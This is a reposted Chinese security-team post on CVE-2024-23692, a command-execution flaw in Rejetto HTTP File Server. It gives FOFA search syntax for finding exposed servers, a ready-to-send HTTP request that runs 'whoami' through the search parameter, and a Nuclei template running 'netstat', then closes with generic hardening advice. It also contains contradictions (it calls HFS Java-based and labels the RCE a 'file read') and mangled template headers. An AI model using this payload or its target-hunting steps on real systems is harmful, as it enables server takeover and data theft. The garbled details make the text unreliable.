Rejetto HTTP文件服务器是一款免费的、跨平台的、基于Java的轻量级HTTP文件服务器软件。它允许用户通过Web浏览器访问和管理文件,支持上传、下载、删除、重命名、创建目录等操作。Rejetto HTTP文件服务器 search接口处存在RCE漏洞(CVE-2024-23692),恶意攻击者可能利用此漏洞执行恶意命令,获取服务器敏感信息,最终可能导致服务器失陷。
》》》影响范围《《《
Rejetto HTTP File Server <= 2.3m
步骤一:使用以下搜索语法获取测试资产并确定测试目标~~~
# 搜索语法
app="HFS"
步骤二:发送以下数据包进行命令执行后可在响应正文中获取命令的执行结果!
GET /?n=%0A&cmd=whoami&search=%25xxx%25url:%password%}{.exec|{.?cmd.}|timeout=15|out=abc.}{.?n.}{.?n.}RESULT:{.?n.}{.^abc.}===={.?n.} HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: close
id: Rejetto-search-RCE
info:
name: Rejetto HTTP文件服务器-RCE-search(CVE-2024-23692)
author: WLF
severity: high
metadata:
FOFA: app="HFS"
Hunter:
variables:
filename: "{{to_lower(rand_base(5))}}"
boundary: "{{to_lower(rand_base(20))}}"
http:
raw:
|
GET /?n=%0A&cmd=netstat&search=%25xxx%25url:%password%}{.exec|{.?cmd.}|timeout=15|out=abc.}{.?n.}{.?n.}RESULT:{.?n.}{.^abc.}===={.?n.} HTTP/1.1
Host: {{Hostname}}
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36 :
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
en-US,en;q=0.5 :
gzip, deflate, br :
Connection: close
matchers:
type: dsl
dsl:
status_code==200 && contains_all(body,"ESTABLISHED","TIME_WAIT")
首先,是输入验证和过滤,确保用户输入的数据不包含任何恶意命令或特殊字符,使用白名单过滤来限制用户输入的范围。其次,采用参数化查询或使用安全的API来与外部系统进行交互,避免直接拼接用户输入到命令中,以防止命令注入攻击。第三,严格限制应用程序的权限,确保应用程序运行时只能访问和执行必要的系统资源和命令。第四,定期更新和维护系统和组件,及时应用安全补丁,以修复已知的漏洞。最后,加强安全培训和意识提升,培养开发人员和系统管理员对命令执行漏洞的认识和应对能力,以提高系统的整体安全性。通过综合这些措施,可以有效地修复命令执行漏洞,并提高系统对命令注入攻击的防范能力。
原文始发于微信公众号(揽月安全团队):CVE-2024-23692:Rejetto HTTP文件服务器-任意文件读取-search
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论